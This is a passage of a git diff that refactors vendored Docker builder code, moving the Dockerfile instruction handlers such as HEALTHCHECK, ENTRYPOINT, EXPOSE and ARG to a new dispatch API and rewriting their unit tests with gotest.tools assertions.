+			fmt.Fprintf(d.builder.Stdout, "Note: overriding previous HEALTHCHECK: %v\n", oldCmd)
 		}
-		healthcheck.Interval = interval
-
-		timeout, err := parseOptInterval(flTimeout)
-		if err != nil {
-			return err
-		}
-		healthcheck.Timeout = timeout
-
-		if flRetries.Value != "" {
-			retries, err := strconv.ParseInt(flRetries.Value, 10, 32)
-			if err != nil {
-				return err
-			}
-			if retries < 1 {
-				return fmt.Errorf("--retries must be at least 1 (not %d)", retries)
-			}
-			healthcheck.Retries = int(retries)
-		} else {
-			healthcheck.Retries = 0
-		}
-
-		b.runConfig.Healthcheck = &healthcheck
 	}
-
-	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("HEALTHCHECK %q", b.runConfig.Healthcheck))
+	runConfig.Healthcheck = c.Health
+	return d.builder.commit(d.state, fmt.Sprintf("HEALTHCHECK %q", runConfig.Healthcheck))
 }
 
 // ENTRYPOINT /usr/sbin/nginx
@@ -577,80 +458,52 @@ func healthcheck(b *Builder, args []string, attributes map[string]bool, original
 // Set the entrypoint to /usr/sbin/nginx. Will accept the CMD as the arguments
 // to /usr/sbin/nginx. Uses the default shell if not in JSON format.
 //
-// Handles command processing similar to CMD and RUN, only b.runConfig.Entrypoint
-// is initialized at NewBuilder time instead of through argument parsing.
+// Handles command processing similar to CMD and RUN, only req.runConfig.Entrypoint
+// is initialized at newBuilder time instead of through argument parsing.
 //
-func entrypoint(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if err := b.flags.Parse(); err != nil {
-		return err
-	}
-
-	parsed := handleJSONArgs(args, attributes)
-
-	switch {
-	case attributes["json"]:
-		// ENTRYPOINT ["echo", "hi"]
-		b.runConfig.Entrypoint = strslice.StrSlice(parsed)
-	case len(parsed) == 0:
-		// ENTRYPOINT []
-		b.runConfig.Entrypoint = nil
-	default:
-		// ENTRYPOINT echo hi
-		b.runConfig.Entrypoint = strslice.StrSlice(append(getShell(b.runConfig), parsed[0]))
-	}
-
-	// when setting the entrypoint if a CMD was not explicitly set then
-	// set the command to nil
-	if !b.cmdSet {
-		b.runConfig.Cmd = nil
-	}
-
-	if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("ENTRYPOINT %q", b.runConfig.Entrypoint)); err != nil {
-		return err
+func dispatchEntrypoint(d dispatchRequest, c *instructions.EntrypointCommand) error {
+	runConfig := d.state.runConfig
+	cmd := resolveCmdLine(c.ShellDependantCmdLine, runConfig, d.state.operatingSystem)
+	runConfig.Entrypoint = cmd
+	if !d.state.cmdSet {
+		runConfig.Cmd = nil
 	}
 
-	return nil
+	return d.builder.commit(d.state, fmt.Sprintf("ENTRYPOINT %q", runConfig.Entrypoint))
 }
 
 // EXPOSE 6667/tcp 7000/tcp
 //
 // Expose ports for links and port mappings. This all ends up in
-// b.runConfig.ExposedPorts for runconfig.
-//
-func expose(b *Builder, args []string, attributes map[string]bool, original string) error {
-	portsTab := args
-
-	if len(args) == 0 {
-		return errAtLeastOneArgument("EXPOSE")
+// req.runConfig.ExposedPorts for runconfig.
+//
+func dispatchExpose(d dispatchRequest, c *instructions.ExposeCommand, envs []string) error {
+	// custom multi word expansion
+	// expose $FOO with FOO="80 443" is expanded as EXPOSE [80,443]. This is the only command supporting word to words expansion
+	// so the word processing has been de-generalized
+	ports := []string{}
+	for _, p := range c.Ports {
+		ps, err := d.shlex.ProcessWords(p, envs)
+		if err != nil {
+			return err
+		}
+		ports = append(ports, ps...)
 	}
+	c.Ports = ports
 
-	if err := b.flags.Parse(); err != nil {
+	ps, _, err := nat.ParsePortSpecs(ports)
+	if err != nil {
 		return err
 	}
 
-	if b.runConfig.ExposedPorts == nil {
-		b.runConfig.ExposedPorts = make(nat.PortSet)
+	if d.state.runConfig.ExposedPorts == nil {
+		d.state.runConfig.ExposedPorts = make(nat.PortSet)
 	}
-
-	ports, _, err := nat.ParsePortSpecs(portsTab)
-	if err != nil {
-		return err
+	for p := range ps {
+		d.state.runConfig.ExposedPorts[p] = struct{}{}
 	}
 
-	// instead of using ports directly, we build a list of ports and sort it so
-	// the order is consistent. This prevents cache burst where map ordering
-	// changes between builds
-	portList := make([]string, len(ports))
-	var i int
-	for port := range ports {
-		if _, exists := b.runConfig.ExposedPorts[port]; !exists {
-			b.runConfig.ExposedPorts[port] = struct{}{}
-		}
-		portList[i] = string(port)
-		i++
-	}
-	sort.Strings(portList)
-	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("EXPOSE %s", strings.Join(portList, " ")))
+	return d.builder.commit(d.state, "EXPOSE "+strings.Join(c.Ports, " "))
 }
 
 // USER foo
@@ -658,164 +511,61 @@ func expose(b *Builder, args []string, attributes map[string]bool, original stri
 // Set the user to 'foo' for future commands and when running the
 // ENTRYPOINT/CMD at container run time.
 //
-func user(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if len(args) != 1 {
-		return errExactlyOneArgument("USER")
-	}
-
-	if err := b.flags.Parse(); err != nil {
-		return err
-	}
-
-	b.runConfig.User = args[0]
-	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("USER %v", args))
+func dispatchUser(d dispatchRequest, c *instructions.UserCommand) error {
+	d.state.runConfig.User = c.User
+	return d.builder.commit(d.state, fmt.Sprintf("USER %v", c.User))
 }
 
 // VOLUME /foo
 //
 // Expose the volume /foo for use. Will also accept the JSON array form.
 //
-func volume(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if len(args) == 0 {
-		return errAtLeastOneArgument("VOLUME")
-	}
-
-	if err := b.flags.Parse(); err != nil {
-		return err
-	}
-
-	if b.runConfig.Volumes == nil {
-		b.runConfig.Volumes = map[string]struct{}{}
+func dispatchVolume(d dispatchRequest, c *instructions.VolumeCommand) error {
+	if d.state.runConfig.Volumes == nil {
+		d.state.runConfig.Volumes = map[string]struct{}{}
 	}
-	for _, v := range args {
-		v = strings.TrimSpace(v)
+	for _, v := range c.Volumes {
 		if v == "" {
-			return fmt.Errorf("VOLUME specified can not be an empty string")
+			return errors.New("VOLUME specified can not be an empty string")
 		}
-		b.runConfig.Volumes[v] = struct{}{}
-	}
-	if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("VOLUME %v", args)); err != nil {
-		return err
+		d.state.runConfig.Volumes[v] = struct{}{}
 	}
-	return nil
+	return d.builder.commit(d.state, fmt.Sprintf("VOLUME %v", c.Volumes))
 }
 
 // STOPSIGNAL signal
 //
 // Set the signal that will be used to kill the container.
-func stopSignal(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if len(args) != 1 {
-		return errExactlyOneArgument("STOPSIGNAL")
-	}
+func dispatchStopSignal(d dispatchRequest, c *instructions.StopSignalCommand) error {
 
-	sig := args[0]
-	_, err := signal.ParseSignal(sig)
+	_, err := signal.ParseSignal(c.Signal)
 	if err != nil {
-		return err
+		return errdefs.InvalidParameter(err)
 	}
-
-	b.runConfig.StopSignal = sig
-	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("STOPSIGNAL %v", args))
+	d.state.runConfig.StopSignal = c.Signal
+	return d.builder.commit(d.state, fmt.Sprintf("STOPSIGNAL %v", c.Signal))
 }
 
 // ARG name[=value]
 //
 // Adds the variable foo to the trusted list of variables that can be passed
-// to builder using the --build-arg flag for expansion/subsitution or passing to 'run'.
+// to builder using the --build-arg flag for expansion/substitution or passing to 'run'.
 // Dockerfile author may optionally set a default value of this variable.
-func arg(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if len(args) != 1 {
-		return errExactlyOneArgument("ARG")
-	}
-
-	var (
-		name       string
-		newValue   string
-		hasDefault bool
-	)
-
-	arg := args[0]
-	// 'arg' can just be a name or name-value pair. Note that this is different
-	// from 'env' that handles the split of name and value at the parser level.
-	// The reason for doing it differently for 'arg' is that we support just
-	// defining an arg and not assign it a value (while 'env' always expects a
-	// name-value pair). If possible, it will be good to harmonize the two.
-	if strings.Contains(arg, "=") {
-		parts := strings.SplitN(arg, "=", 2)
-		if len(parts[0]) == 0 {
-			return errBlankCommandNames("ARG")
-		}
-
-		name = parts[0]
-		newValue = parts[1]
-		hasDefault = true
-	} else {
-		name = arg
-		hasDefault = false
-	}
-	// add the arg to allowed list of build-time args from this step on.
-	b.allowedBuildArgs[name] = true
+func dispatchArg(d dispatchRequest, c *instructions.ArgCommand) error {
 
-	// If there is a default value associated with this arg then add it to the
-	// b.buildArgs if one is not already passed to the builder. The args passed
-	// to builder override the default value of 'arg'. Note that a 'nil' for
-	// a value means that the user specified "--build-arg FOO" and "FOO" wasn't
-	// defined as an env var - and in that case we DO want to use the default
-	// value specified in the ARG cmd.
-	if baValue, ok := b.options.BuildArgs[name]; (!ok || baValue == nil) && hasDefault {
-		b.options.BuildArgs[name] = &newValue
+	commitStr := "ARG " + c.Key
+	if c.Value != nil {
+		commitStr += "=" + *c.Value
 	}
 
-	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("ARG %s", arg))
+	d.state.buildArgs.AddArg(c.Key, c.Value)
+	return d.builder.commit(d.state, commitStr)
 }
 
 // SHELL powershell -command
 //
 // Set the non-default shell to use.
-func shell(b *Builder, args []string, attributes map[string]bool, original string) error {
-	if err := b.flags.Parse(); err != nil {
-		return err
-	}
-	shellSlice := handleJSONArgs(args, attributes)
-	switch {
-	case len(shellSlice) == 0:
-		// SHELL []
-		return errAtLeastOneArgument("SHELL")
-	case attributes["json"]:
-		// SHELL ["powershell", "-command"]
-		b.runConfig.Shell = strslice.StrSlice(shellSlice)
-	default:
-		// SHELL powershell -command - not JSON
-		return errNotJSON("SHELL", original)
-	}
-	return b.commit("", b.runConfig.Cmd, fmt.Sprintf("SHELL %v", shellSlice))
-}
-
-func errAtLeastOneArgument(command string) error {
-	return fmt.Errorf("%s requires at least one argument", command)
-}
-
-func errExactlyOneArgument(command string) error {
-	return fmt.Errorf("%s requires exactly one argument", command)
-}
-
-func errAtLeastTwoArguments(command string) error {
-	return fmt.Errorf("%s requires at least two arguments", command)
-}
-
-func errBlankCommandNames(command string) error {
-	return fmt.Errorf("%s names can not be blank", command)
-}
-
-func errTooManyArguments(command string) error {
-	return fmt.Errorf("Bad input to %s, too many arguments", command)
-}
-
-// getShell is a helper function which gets the right shell for prefixing the
-// shell-form of RUN, ENTRYPOINT and CMD instructions
-func getShell(c *container.Config) []string {
-	if 0 == len(c.Shell) {
-		return defaultShell[:]
-	}
-	return c.Shell[:]
+func dispatchShell(d dispatchRequest, c *instructions.ShellCommand) error {
+	d.state.runConfig.Shell = c.Shell
+	return d.builder.commit(d.state, fmt.Sprintf("SHELL %v", d.state.runConfig.Shell))
 }
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go
index f7c57f7e3b..36d20a1a82 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go
@@ -1,517 +1,474 @@
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
 import (
-	"fmt"
+	"bytes"
+	"context"
 	"runtime"
-	"strings"
 	"testing"
 
 	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/strslice"
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/pkg/system"
 	"github.com/docker/go-connections/nat"
+	"github.com/moby/buildkit/frontend/dockerfile/instructions"
+	"github.com/moby/buildkit/frontend/dockerfile/shell"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
-type commandWithFunction struct {
-	name     string
-	function func(args []string) error
+func newBuilderWithMockBackend() *Builder {
+	mockBackend := &MockBackend{}
+	ctx := context.Background()
+	b := &Builder{
+		options:       &types.ImageBuildOptions{Platform: runtime.GOOS},
+		docker:        mockBackend,
+		Stdout:        new(bytes.Buffer),
+		clientCtx:     ctx,
+		disableCommit: true,
+		imageSources: newImageSources(ctx, builderOptions{
+			Options: &types.ImageBuildOptions{Platform: runtime.GOOS},
+			Backend: mockBackend,
+		}),
+		imageProber:      newImageProber(mockBackend, nil, false),
+		containerManager: newContainerManager(mockBackend),
+	}
+	return b
 }
 
-func TestCommandsExactlyOneArgument(t *testing.T) {
-	commands := []commandWithFunction{
-		{"MAINTAINER", func(args []string) error { return maintainer(nil, args, nil, "") }},
-		{"FROM", func(args []string) error { return from(nil, args, nil, "") }},
-		{"WORKDIR", func(args []string) error { return workdir(nil, args, nil, "") }},
-		{"USER", func(args []string) error { return user(nil, args, nil, "") }},
-		{"STOPSIGNAL", func(args []string) error { return stopSignal(nil, args, nil, "") }}}
-
-	for _, command := range commands {
-		err := command.function([]string{})
-
-		if err == nil {
-			t.Fatalf("Error should be present for %s command", command.name)
-		}
-
-		expectedError := errExactlyOneArgument(command.name)
-
-		if err.Error() != expectedError.Error() {
-			t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError)
-		}
-	}
-}
-
-func TestCommandsAtLeastOneArgument(t *testing.T) {
-	commands := []commandWithFunction{
-		{"ENV", func(args []string) error { return env(nil, args, nil, "") }},
-		{"LABEL", func(args []string) error { return label(nil, args, nil, "") }},
-		{"ONBUILD", func(args []string) error { return onbuild(nil, args, nil, "") }},
-		{"HEALTHCHECK", func(args []string) error { return healthcheck(nil, args, nil, "") }},
-		{"EXPOSE", func(args []string) error { return expose(nil, args, nil, "") }},
-		{"VOLUME", func(args []string) error { return volume(nil, args, nil, "") }}}
-
-	for _, command := range commands {
-		err := command.function([]string{})
-
-		if err == nil {
-			t.Fatalf("Error should be present for %s command", command.name)
-		}
-
-		expectedError := errAtLeastOneArgument(command.name)
-
-		if err.Error() != expectedError.Error() {
-			t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError)
-		}
-	}
+func TestEnv2Variables(t *testing.T) {
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
+	envCommand := &instructions.EnvCommand{
+		Env: instructions.KeyValuePairs{
+			instructions.KeyValuePair{Key: "var1", Value: "val1"},
+			instructions.KeyValuePair{Key: "var2", Value: "val2"},
+		},
+	}
+	err := dispatch(sb, envCommand)
+	assert.NilError(t, err)
+
+	expected := []string{
+		"var1=val1",
+		"var2=val2",
+	}
+	assert.Check(t, is.DeepEqual(expected, sb.state.runConfig.Env))
 }
 
-func TestCommandsAtLeastTwoArguments(t *testing.T) {
-	commands := []commandWithFunction{
-		{"ADD", func(args []string) error { return add(nil, args, nil, "") }},
-		{"COPY", func(args []string) error { return dispatchCopy(nil, args, nil, "") }}}
-
-	for _, command := range commands {
-		err := command.function([]string{"arg1"})
-
-		if err == nil {
-			t.Fatalf("Error should be present for %s command", command.name)
-		}
-
-		expectedError := errAtLeastTwoArguments(command.name)
-
-		if err.Error() != expectedError.Error() {
-			t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError)
-		}
-	}
+func TestEnvValueWithExistingRunConfigEnv(t *testing.T) {
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
+	sb.state.runConfig.Env = []string{"var1=old", "var2=fromenv"}
+	envCommand := &instructions.EnvCommand{
+		Env: instructions.KeyValuePairs{
+			instructions.KeyValuePair{Key: "var1", Value: "val1"},
+		},
+	}
+	err := dispatch(sb, envCommand)
+	assert.NilError(t, err)
+	expected := []string{
+		"var1=val1",
+		"var2=fromenv",
+	}
+	assert.Check(t, is.DeepEqual(expected, sb.state.runConfig.Env))
 }
 
-func TestCommandsTooManyArguments(t *testing.T) {
-	commands := []commandWithFunction{
-		{"ENV", func(args []string) error { return env(nil, args, nil, "") }},
-		{"LABEL", func(args []string) error { return label(nil, args, nil, "") }}}
-
-	for _, command := range commands {
-		err := command.function([]string{"arg1", "arg2", "arg3"})
-
-		if err == nil {
-			t.Fatalf("Error should be present for %s command", command.name)
-		}
-
-		expectedError := errTooManyArguments(command.name)
-
-		if err.Error() != expectedError.Error() {
-			t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError)
-		}
-	}
+func TestMaintainer(t *testing.T) {
+	maintainerEntry := "Some Maintainer <maintainer@example.com>"
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
+	cmd := &instructions.MaintainerCommand{Maintainer: maintainerEntry}
+	err := dispatch(sb, cmd)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(maintainerEntry, sb.state.maintainer))
 }
 
-func TestCommandseBlankNames(t *testing.T) {
-	bflags := &BFlags{}
-	config := &container.Config{}
-
-	b := &Builder{flags: bflags, runConfig: config, disableCommit: true}
+func TestLabel(t *testing.T) {
+	labelName := "label"
+	labelValue := "value"
 
-	commands := []commandWithFunction{
-		{"ENV", func(args []string) error { return env(b, args, nil, "") }},
-		{"LABEL", func(args []string) error { return label(b, args, nil, "") }},
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
+	cmd := &instructions.LabelCommand{
+		Labels: instructions.KeyValuePairs{
+			instructions.KeyValuePair{Key: labelName, Value: labelValue},
+		},
 	}
+	err := dispatch(sb, cmd)
+	assert.NilError(t, err)
 
-	for _, command := range commands {
-		err := command.function([]string{"", ""})
-
-		if err == nil {
-			t.Fatalf("Error should be present for %s command", command.name)
-		}
-
-		expectedError := errBlankCommandNames(command.name)
-
-		if err.Error() != expectedError.Error() {
-			t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError)
-		}
-	}
+	assert.Assert(t, is.Contains(sb.state.runConfig.Labels, labelName))
+	assert.Check(t, is.Equal(sb.state.runConfig.Labels[labelName], labelValue))
 }
 
-func TestEnv2Variables(t *testing.T) {
-	variables := []string{"var1", "val1", "var2", "val2"}
-
-	bflags := &BFlags{}
-	config := &container.Config{}
-
-	b := &Builder{flags: bflags, runConfig: config, disableCommit: true}
-
-	if err := env(b, variables, nil, ""); err != nil {
-		t.Fatalf("Error when executing env: %s", err.Error())
+func TestFromScratch(t *testing.T) {
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
+	cmd := &instructions.Stage{
+		BaseName: "scratch",
 	}
+	err := initializeStage(sb, cmd)
 
-	expectedVar1 := fmt.Sprintf("%s=%s", variables[0], variables[1])
-	expectedVar2 := fmt.Sprintf("%s=%s", variables[2], variables[3])
-
-	if b.runConfig.Env[0] != expectedVar1 {
-		t.Fatalf("Wrong env output for first variable. Got: %s. Should be: %s", b.runConfig.Env[0], expectedVar1)
+	if runtime.GOOS == "windows" && !system.LCOWSupported() {
+		assert.Check(t, is.Error(err, "Windows does not support FROM scratch"))
+		return
 	}
 
-	if b.runConfig.Env[1] != expectedVar2 {
-		t.Fatalf("Wrong env output for second variable. Got: %s, Should be: %s", b.runConfig.Env[1], expectedVar2)
-	}
+	assert.NilError(t, err)
+	assert.Check(t, sb.state.hasFromImage())
+	assert.Check(t, is.Equal("", sb.state.imageID))
+	expected := "PATH=" + system.DefaultPathEnv(runtime.GOOS)
+	assert.Check(t, is.DeepEqual([]string{expected}, sb.state.runConfig.Env))
 }
 
-func TestMaintainer(t *testing.T) {
-	maintainerEntry := "Some Maintainer <maintainer@example.com>"
-
-	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+func TestFromWithArg(t *testing.T) {
+	tag, expected := ":sometag", "expectedthisid"
 
-	if err := maintainer(b, []string{maintainerEntry}, nil, ""); err != nil {
-		t.Fatalf("Error when executing maintainer: %s", err.Error())
+	getImage := func(name string) (builder.Image, builder.ROLayer, error) {
+		assert.Check(t, is.Equal("alpine"+tag, name))
+		return &mockImage{id: "expectedthisid"}, nil, nil
 	}
+	b := newBuilderWithMockBackend()
+	b.docker.(*MockBackend).getImageFunc = getImage
+	args := NewBuildArgs(make(map[string]*string))
 
-	if b.maintainer != maintainerEntry {
-		t.Fatalf("Maintainer in builder should be set to %s. Got: %s", maintainerEntry, b.maintainer)
-	}
-}
-
-func TestLabel(t *testing.T) {
-	labelName := "label"
-	labelValue := "value"
-
-	labelEntry := []string{labelName, labelValue}
-
-	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
-
-	if err := label(b, labelEntry, nil, ""); err != nil {
-		t.Fatalf("Error when executing label: %s", err.Error())
+	val := "sometag"
+	metaArg := instructions.ArgCommand{
+		Key:   "THETAG",
+		Value: &val,
 	}
-
-	if val, ok := b.runConfig.Labels[labelName]; ok {
-		if val != labelValue {
-			t.Fatalf("Label %s should have value %s, had %s instead", labelName, labelValue, val)
-		}
-	} else {
-		t.Fatalf("Label %s should be present but it is not", labelName)
+	cmd := &instructions.Stage{
+		BaseName: "alpine:${THETAG}",
 	}
-}
-
-func TestFrom(t *testing.T) {
-	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
+	err := processMetaArg(metaArg, shell.NewLex('\\'), args)
 
-	err := from(b, []string{"scratch"}, nil, "")
+	sb := newDispatchRequest(b, '\\', nil, args, newStagesBuildResults())
+	assert.NilError(t, err)
+	err = initializeStage(sb, cmd)
+	assert.NilError(t, err)
 
-	if runtime.GOOS == "windows" {
-		if err == nil {
-			t.Fatalf("Error not set on Windows")
-		}
+	assert.Check(t, is.Equal(expected, sb.state.imageID))
+	assert.Check(t, is.Equal(expected, sb.state.baseImage.ImageID()))
+	assert.Check(t, is.Len(sb.state.buildArgs.GetAllAllowed(), 0))
+	assert.Check(t, is.Len(sb.state.buildArgs.GetAllMeta(), 1))
+}
 
-		expectedError := "Windows does not support FROM scratch"
+func TestFromWithUndefinedArg(t *testing.T) {
+	tag, expected := "sometag", "expectedthisid"
 
-		if !strings.Contains(err.Error(), expectedError) {
-			t.Fatalf("Error message not correct on Windows. Should be: %s, got: %s", expectedError, err.Error())
-		}
-	} else {
-		if err != nil {
-			t.Fatalf("Error when executing from: %s", err.Error())
-		}
+	getImage := func(name string) (builder.Image, builder.ROLayer, error) {
+		assert.Check(t, is.Equal("alpine", name))
+		return &mockImage{id: "expectedthisid"}, nil, nil
+	}
+	b := newBuilderWithMockBackend()
+	b.docker.(*MockBackend).getImageFunc = getImage
+	sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
 
-		if b.image != "" {
-			t.Fatalf("Image shoule be empty, got: %s", b.image)
-		}
+	b.options.BuildArgs = map[string]*string{"THETAG": &tag}
 
-		if b.noBaseImage != true {
-			t.Fatalf("Image should not have any base image, got: %v", b.noBaseImage)
-		}
+	cmd := &instructions.Stage{
+		BaseName: "alpine${THETAG}",
 	}
+	err := initializeStage(sb, cmd)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(expected, sb.state.imageID))
 }
 
-func TestOnbuildIllegalTriggers(t *testing.T) {
-	triggers := []struct{ command, expectedError string }{
-		{"ONBUILD", "Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed"},
-		{"MAINTAINER", "MAINTAINER isn't allowed as an ONBUILD trigger"},
-		{"FROM", "FROM isn't allowed as an ONBUILD trigger"}}
-
-	for _, trigger := range triggers {
-		b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
-
-		err := onbuild(b, []string{trigger.command}, nil, "")
-
-		if err == nil {
-			t.Fatalf("Error should not be nil")
-		}
-
-		if !strings.Contains(err.Error(), trigger.expectedError) {
-			t.Fatalf("Error message not correct. Should be: %s, got: %s", trigger.expectedError, err.Error())
-		}
-	}
+func TestFromMultiStageWithNamedStage(t *testing.T) {
+	b := newBuilderWithMockBackend()
+	firstFrom := &instructions.Stage{BaseName: "someimg", Name: "base"}
+	secondFrom := &instructions.Stage{BaseName: "base"}
+	previousResults := newStagesBuildResults()
+	firstSB := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), previousResults)
+	secondSB := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), previousResults)
+	err := initializeStage(firstSB, firstFrom)
+	assert.NilError(t, err)
+	assert.Check(t, firstSB.state.hasFromImage())
+	previousResults.indexed["base"] = firstSB.state.runConfig
+	previousResults.flat = append(previousResults.flat, firstSB.state.runConfig)
+	err = initializeStage(secondSB, secondFrom)
+	assert.NilError(t, err)
+	assert.Check(t, secondSB.state.hasFromImage())
 }
 
 func TestOnbuild(t *testing.T) {
-	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
-
-	err := onbuild(b, []string{"ADD", ".", "/app/src"}, nil, "ONBUILD ADD . /app/src")
-
-	if err != nil {
-		t.Fatalf("Error should be empty, got: %s", err.Error())
-	}
-
-	expectedOnbuild := "ADD . /app/src"
-
-	if b.runConfig.OnBuild[0] != expectedOnbuild {
-		t.Fatalf("Wrong ONBUILD command. Expected: %s, got: %s", expectedOnbuild, b.runConfig.OnBuild[0])
-	}
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
+	cmd := &instructions.OnbuildCommand{
+		Expression: "ADD . /app/src",
+	}
+	err := dispatch(sb, cmd)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal("ADD . /app/src", sb.state.runConfig.OnBuild[0]))
 }
 
 func TestWorkdir(t *testing.T) {
-	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
-
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
+	sb.state.baseImage = &mockImage{}
 	workingDir := "/app"
-
 	if runtime.GOOS == "windows" {
-		workingDir = "C:\app"
-	}
-
-	err := workdir(b, []string{workingDir}, nil, "")
-
-	if err != nil {
-		t.Fatalf("Error should be empty, got: %s", err.Error())
+		workingDir = "C:\\app"
 	}
-
-	if b.runConfig.WorkingDir != workingDir {
-		t.Fatalf("WorkingDir should be set to %s, got %s", workingDir, b.runConfig.WorkingDir)
+	cmd := &instructions.WorkdirCommand{
+		Path: workingDir,
 	}
 
+	err := dispatch(sb, cmd)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(workingDir, sb.state.runConfig.WorkingDir))
 }
 
 func TestCmd(t *testing.T) {
-	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
-
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
+	sb.state.baseImage = &mockImage{}
 	command := "./executable"
 
-	err := cmd(b, []string{command}, nil, "")
-
-	if err != nil {
-		t.Fatalf("Error should be empty, got: %s", err.Error())
+	cmd := &instructions.CmdCommand{
+		ShellDependantCmdLine: instructions.ShellDependantCmdLine{
+			CmdLine:      strslice.StrSlice{command},
+			PrependShell: true,
+		},
 	}
+	err := dispatch(sb, cmd)
+	assert.NilError(t, err)
 
 	var expectedCommand strslice.StrSlice
-
 	if runtime.GOOS == "windows" {
 		expectedCommand = strslice.StrSlice(append([]string{"cmd"}, "/S", "/C", command))
 	} else {
 		expectedCommand = strslice.StrSlice(append([]string{"/bin/sh"}, "-c", command))
 	}
 
-	if !compareStrSlice(b.runConfig.Cmd, expectedCommand) {
-		t.Fatalf("Command should be set to %s, got %s", command, b.runConfig.Cmd)
-	}
-
-	if !b.cmdSet {
-		t.Fatalf("Command should be marked as set")
-	}
-}
-
-func compareStrSlice(slice1, slice2 strslice.StrSlice) bool {
-	if len(slice1) != len(slice2) {
-		return false
-	}
-
-	for i := range slice1 {
-		if slice1[i] != slice2[i] {
-			return false
-		}
-	}
-
-	return true
+	assert.Check(t, is.DeepEqual(expectedCommand, sb.state.runConfig.Cmd))
+	assert.Check(t, sb.state.cmdSet)
 }
 
 func TestHealthcheckNone(t *testing.T) {
-	b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true}
-
-	if err := healthcheck(b, []string{"NONE"}, nil, ""); err != nil {
-		t.Fatalf("Error should be empty, got: %s", err.Error())
-	}
-
-	if b.runConfig.Healthcheck == nil {
-		t.Fatal("Healthcheck should be set, got nil")
-	}
-
-	expectedTest := strslice.StrSlice(append([]string{"NONE"}))
-
-	if !compareStrSlice(expectedTest, b.runConfig.Healthcheck.Test) {
-		t.Fatalf("Command should be set to %s, got %s", expectedTest, b.runConfig.Healthcheck.Test)
-	}
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
+	cmd := &instructions.HealthCheckCommand{
+		Health: &container.HealthConfig{
+			Test: []string{"NONE"},
+		},
+	}
+	err := dispatch(sb, cmd)
+	assert.NilError(t, err)
+
+	assert.Assert(t, sb.state.runConfig.Healthcheck != nil)
+	assert.Check(t, is.DeepEqual([]string{"NONE"}, sb.state.runConfig.Healthcheck.Test))
 }
 
 func TestHealthcheckCmd(t *testing.T) {
-	b := &Builder{flags: &BFlags{flags: make(map[string]*Flag)}, runConfig: &container.Config{}, disableCommit: true}
-
-	if err := healthcheck(b, []string{"CMD", "curl", "-f", "http://localhost/", "||", "exit", "1"}, nil, ""); err != nil {
-		t.Fatalf("Error should be empty, got: %s", err.Error())
-	}
 
-	if b.runConfig.Healthcheck == nil {
-		t.Fatal("Healthcheck should be set, got nil")
+	b := newBuilderWithMockBackend()
+	sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults())
